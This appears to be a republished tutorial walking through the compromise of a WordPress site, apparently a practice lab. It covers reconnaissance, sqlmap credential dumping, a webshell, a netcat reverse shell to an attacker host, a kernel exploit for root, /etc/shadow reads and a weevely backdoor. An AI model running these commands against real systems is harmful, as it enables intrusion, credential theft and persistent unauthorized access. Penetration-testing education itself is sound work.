BestHub
Sign in
Information Security 10 min read

Step‑by‑Step WordPress Site Penetration Testing Tutorial

This tutorial walks beginners through the entire process of compromising a WordPress website, from initial information gathering and DNS enumeration to vulnerability scanning, exploitation with tools like sqlmap and nmap, privilege escalation, and establishing persistent backdoors.

Java Architect Essentials
Java Architect Essentials
Java Architect Essentials
Step‑by‑Step WordPress Site Penetration Testing Tutorial

This article provides a comprehensive, beginner‑friendly walkthrough of hacking a WordPress site, covering information gathering, DNS lookup, server fingerprinting, vulnerability scanning, exploitation, and post‑exploitation.

1. Information gathering – Use ping to obtain the target IP (e.g., 173.236.138.113) and services like who.is to retrieve DNS records (A, NS, MX, etc.).

2. Server identification – Determine the web server type (Apache) and version, as well as the operating system (Fedora Linux) using whatweb from Backtrack 5.

3. Port scanning – Run nmap to discover open ports; only port 80 is open on the target.

4. Vulnerability scanning – Use nikto and w3af to enumerate common web vulnerabilities (SQL injection, XSS, LFI, etc.).

5. Exploiting SQL injection – Identify a vulnerable URL (e.g., http://hack-test.com/Hackademic_RTB1/?cat=d%27z%2220 ) and run sqlmap -u to enumerate databases, tables, and dump credentials from the wp_users table.

Sample command output:

id
uid=48(apache) gid=489(apache) groups=489(apache)

After retrieving password hashes, the article suggests using online hash‑cracking services.

6. Gaining remote shell – Upload a PHP webshell via the Textile plugin, then use nc to reverse‑connect to the attacker’s machine (listening on port 5555).

Example reverse‑shell command executed on the compromised host:

nc -e /bin/sh attacker_ip 5555

7. Privilege escalation – Search Exploit‑DB for a kernel exploit matching the server’s kernel version (2.6.31.5‑127.fc12). Download the exploit (e.g., http://www.exploit-db.com/exploits/15285 ), compile it, and execute to obtain root privileges.

Compilation command:

gcc roro.c -o roro

Running the compiled exploit:

./roro

After escalation, the article shows reading /etc/shadow and suggests creating a persistent PHP backdoor with weevely (password “koko”).

Generating the backdoor:

./main.py -g -o hax.php -p koko

Deploying and using the backdoor:

./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko

The tutorial concludes with a reminder that the attacker now has full root access and can explore further post‑exploitation techniques.

information securityPrivilege EscalationWordPresssqlmappenetration testingWebShellnmap
Java Architect Essentials
Written by

Java Architect Essentials

Committed to sharing quality articles and tutorials to help Java programmers progress from junior to mid-level to senior architect. We curate high-quality learning resources, interview questions, videos, and projects from across the internet to help you systematically improve your Java architecture skills. Follow and reply '1024' to get Java programming resources. Learn together, grow together.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment